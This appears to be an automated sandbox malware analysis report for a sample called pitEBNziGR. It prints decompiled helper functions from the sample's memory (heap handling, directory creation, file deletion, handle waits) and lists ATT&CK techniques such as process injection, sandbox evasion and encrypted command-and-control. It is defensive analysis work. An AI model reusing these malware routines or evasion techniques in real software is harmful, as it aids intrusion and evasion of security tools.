Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 39448fa48b174563079ee172c5bd34ef58bb60653169ea4c08b61cf49e2963bd
Instruction ID: db7f55041ae170eabc6417cf50742694df10eb5c96d0e2db019e86399688674c
Opcode Fuzzy Hash: 39448fa48b174563079ee172c5bd34ef58bb60653169ea4c08b61cf49e2963bd
Instruction Fuzzy Hash: 4921FC76A01218AFDB11DFD8DC88FAEBBBCEB44711F1441A6ED05E7250E7319E119BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A88420, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00A88420(intOrPtr __ecx, signed int __edx, long* _a4) {
				intOrPtr _v8;
				void* _t20;
				signed int _t28;
				signed int _t36;
				long _t44;
				void* _t45;

				_t36 = __edx;
				_t26 = _a4;
				_v8 = __ecx;
				_t28 = __edx * 0x6e;
				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
				 *_a4 = _t44;
				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
				_t45 = _t20;
				if(_t45 == 0) {
					return _t20;
				} else {
					_push(_t28);
					if(E00A829B0(_t45, _t26, _v8, _t36) == 0) {
						return _t45;
					}
					HeapFree(GetProcessHeap(), 0, _t45);
					return 0;
				}
			}

0x00a88429
0x00a8842b
0x00a88433
0x00a88438
0x00a88460
0x00a88466
0x00a8846f
0x00a88475
0x00a88479
0x00a884b1
0x00a8847b
0x00a8847b
0x00a8848e
0x00000000
0x00a884a9
0x00a8849a
0x00a884a8
0x00a884a8

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00A88468
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00A8846F

Part of subcall function 00A829B0: memset.NTDLL ref: 00A829C4

GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00A88493
HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 00A8849A

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: f7a8f4a0e4be6fe748b832975684536c56f52fbdad50fc75ffe761c0cdf741fb
Instruction ID: ae2991194f9aa6128f70f9f7436a62589f68262df93a8a4c864dc6db3fafba5f
Opcode Fuzzy Hash: f7a8f4a0e4be6fe748b832975684536c56f52fbdad50fc75ffe761c0cdf741fb
Instruction Fuzzy Hash: C501C433F005246BD724ABA9AC4DA5EBBA9DB88661F414371FD0CD7385EA318C1187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A818D0, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A818D0() {
				short _v524;
				signed int _t14;
				signed char _t16;
				void* _t21;
				void* _t22;

				memset( &_v524, 0, 0x208);
				if( *0xa8c7c0 == 0) {
					L9:
					return 1;
				} else {
					_t21 = 0;
					do {
						_t2 = _t21 + 0xa8c7c0; // 0x0
						_t14 =  *_t2 & 0x0000ffff;
						_t21 = _t21 + 2;
						 *(_t22 + _t21 - 0x20a) = _t14;
						if(_t14 != 0x5c) {
							goto L8;
						} else {
							_t16 = GetFileAttributesW( &_v524);
							if(_t16 != 0xffffffff) {
								if((_t16 & 0x00000010) == 0) {
									goto L6;
								} else {
									goto L8;
								}
							} else {
								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
									goto L8;
								} else {
									L6:
									return 0;
								}
							}
						}
						goto L10;
						L8:
					} while ( *(_t21 + 0xa8c7c0) != 0);
					goto L9;
				}
				L10:
			}

0x00a818e8
0x00a818f9
0x00a8195e
0x00a81967
0x00a818fb
0x00a818fb
0x00a81900
0x00a81900
0x00a81900
0x00a81907
0x00a8190a
0x00a81915
0x00000000
0x00a81917
0x00a8191e
0x00a81927
0x00a81952
0x00000000
0x00000000
0x00000000
0x00000000
0x00a81929
0x00a8193a
0x00000000
0x00a81949
0x00a81949
0x00a8194f
0x00a8194f
0x00a8193a
0x00a81927
0x00000000
0x00a81954
0x00a81954
0x00000000
0x00a81900
0x00000000

APIs

memset.NTDLL ref: 00A818E8
GetFileAttributesW.KERNEL32(?), ref: 00A8191E
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A81932
GetLastError.KERNEL32 ref: 00A8193C

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryErrorFileLastmemset
String ID:
API String ID: 528582180-0
Opcode ID: 12384f4bbe04f2e34790b050ce5f71615c5cfacab0398661be916310dae1e3ff
Instruction ID: 85152e394dc5a29d21819e5912e7d797c1893fb64ee96d30254d7e47b8ff9cdb
Opcode Fuzzy Hash: 12384f4bbe04f2e34790b050ce5f71615c5cfacab0398661be916310dae1e3ff
Instruction Fuzzy Hash: 1601843190031996EB70EBA4AC9DBE6736CFB04728F000795E969E30D1E775A986CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00A88B30, Relevance: 6.0, APIs: 4, Instructions: 46
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A88B30(WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr* _t14;
				intOrPtr* _t19;
				intOrPtr _t24;
				WCHAR* _t25;
				intOrPtr* _t26;

				_t25 = _a4;
				_t10 = _t25 + 0x24;
				_a4 = _t25 + 0x24;
				_t24 = E00A819E0(_t10);
				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
					L8:
					return 1;
				}
				_t19 = _a8;
				_t14 =  *_t19;
				if(_t14 == 0) {
					L5:
					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
					if(_t26 != 0) {
						_t8 = _t26 + 4; // 0x4
						lstrcpyW(_t8, _a4);
						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
						 *_t26 =  *_t19;
						 *_t19 = _t26;
					}
					L7:
					goto L8;
				}
				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
					_t14 =  *_t14;
					if(_t14 != 0) {
						continue;
					}
					goto L5;
				}
				goto L7;
			}

0x00a88b34
0x00a88b38
0x00a88b3d
0x00a88b45
0x00a88b50
0x00a88ba3
0x00a88baa
0x00a88baa
0x00a88b53
0x00a88b56
0x00a88b5a
0x00a88b6e
0x00a88b82
0x00a88b86
0x00a88b8b
0x00a88b8f
0x00a88b95
0x00a88b9d
0x00a88b9f
0x00a88b9f
0x00a88ba1
0x00000000
0x00a88ba1
0x00a88b60
0x00a88b68
0x00a88b6c
0x00000000
0x00000000
0x00000000
0x00a88b6c
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,00000000,?,00A8215D,0000022C,00000000,?,?), ref: 00A88B47
GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,00A8215D,0000022C,00000000,?,?), ref: 00A88B75
RtlAllocateHeap.NTDLL(00000000,?,00A8215D), ref: 00A88B7C
lstrcpyW.KERNEL32(00000004,?), ref: 00A88B8F

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCurrentlstrcpy
String ID:
API String ID: 2952365268-0
Opcode ID: 9b1851981e0b598eb561e33e0630330cf530006f0c158caab5251f2b3a920af8
Instruction ID: 27fbf1ba0e7f45fc93b8fec6690f354aad7b56ac530f15dd0d1fa19bf292da1a
Opcode Fuzzy Hash: 9b1851981e0b598eb561e33e0630330cf530006f0c158caab5251f2b3a920af8
Instruction Fuzzy Hash: 16019E71600304AFCB20EFA9D888A8AB7E8FF84750F548529F945D7251DF34E841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A884C0, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A884C0(intOrPtr __ecx, void* __edx, long* _a4) {
				intOrPtr _v8;
				void* _t5;
				void* _t11;
				void* _t17;

				_t16 = _a4;
				_t11 = __edx;
				_v8 = __ecx;
				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
				_t17 = _t5;
				if(_t17 == 0) {
					return _t5;
				} else {
					if(E00A82D80(_t17, _t16, _v8, _t11) == 0) {
						return _t17;
					}
					HeapFree(GetProcessHeap(), 0, _t17);
					return 0;
				}
			}

0x00a884c9
0x00a884cc
0x00a884ce
0x00a884dc
0x00a884e2
0x00a884e6
0x00a8851d
0x00a884e8
0x00a884fa
0x00000000
0x00a88515
0x00a88506
0x00a88514
0x00a88514

APIs

GetProcessHeap.KERNEL32(00000000,00A88668,?,?,?,00A88668,?), ref: 00A884D5
RtlAllocateHeap.NTDLL(00000000), ref: 00A884DC

Part of subcall function 00A82D80: memset.NTDLL ref: 00A82D94

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A884FF
HeapFree.KERNEL32(00000000), ref: 00A88506

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: 54f01968370014df5c166498b1ce0dea65810f6b9442232af026029557f385e0
Instruction ID: 108500c792a60b430e16332106e72e2a7567b8909c7fe5e7f0e07df6c7ed998d
Opcode Fuzzy Hash: 54f01968370014df5c166498b1ce0dea65810f6b9442232af026029557f385e0
Instruction Fuzzy Hash: 74F09636B001147BDA10A7E97C4D65EFB9CDF44673F040162FD08D2211E9319D114BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00A81970, Relevance: 6.0, APIs: 4, Instructions: 31
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A81970() {
				void* _v8;
				short _v528;
				void* _t15;

				E00A81830(0xa81010, 0x14, 0x41ce18c7,  &_v8);
				_t15 = _v8;
				 *0xa8c200( &_v528, 0x104, _t15, 0xa8c7c0, _t15);
				HeapFree(GetProcessHeap(), 0, _t15);
				return DeleteFileW( &_v528);
			}

0x00a8198d
0x00a81992
0x00a819a8
0x00a819bb
0x00a819d2

APIs

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

_snwprintf.NTDLL ref: 00A819A8
GetProcessHeap.KERNEL32(00000000,00A89730), ref: 00A819B4
HeapFree.KERNEL32(00000000), ref: 00A819BB
DeleteFileW.KERNEL32(?), ref: 00A819C8

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
String ID:
API String ID: 135842935-0
Opcode ID: 9ede3edbd75d066df729a630341898ff525fc5726384d5fde7ee30c47359d494
Instruction ID: d88497cc33f4fa155086f333c4ab69e43e69f5582f996174261edc93ca73ab2c
Opcode Fuzzy Hash: 9ede3edbd75d066df729a630341898ff525fc5726384d5fde7ee30c47359d494
Instruction Fuzzy Hash: 63F0A0B1901218BBEB10FBE4AC4DFCB7B6CEB05325F100191BA09E2183D6345A068FF1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A750, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A8A750(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0xa8cbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0xa8cbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x00a8a752
0x00a8a758
0x00a8a75b
0x00a8a762
0x00a8a768
0x00a8a773
0x00a8a794
0x00a8a775
0x00a8a777
0x00a8a77c
0x00a8a78c
0x00a8a78c
0x00a8a796
0x00a8a798
0x00a8a79f

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,00A89315,00000000,00A8928E), ref: 00A8A768
CloseHandle.KERNEL32(?,?,00000000,00A89315,00000000,00A8928E), ref: 00A8A77C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00A89315,00000000,00A8928E), ref: 00A8A785
HeapFree.KERNEL32(00000000,?,00000000,00A89315,00000000,00A8928E), ref: 00A8A78C

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$CloseFreeHandleObjectProcessSingleWait
String ID:
API String ID: 1931067520-0
Opcode ID: a6bb0071ed06574369678f3de0e2c2d52aec80baf4ec136b724c387b1db69c65
Instruction ID: 20d495d9b8ec2a289a464fa9fb1ba8842b11cffbc77238547882ad26e0868e8f
Opcode Fuzzy Hash: a6bb0071ed06574369678f3de0e2c2d52aec80baf4ec136b724c387b1db69c65
Instruction Fuzzy Hash: CDF0EC325001209FF711AB94DC8CA167B79EF547317184516F545D7221C3749C41DFB0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report pitEBNziGR

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 00A815B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Function 00A81599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Function 00A81575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Function 00A89EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Function 00A81F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Function 00A82110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Function 00A86E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Function 00A877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Function 00A8A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Function 00A89320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON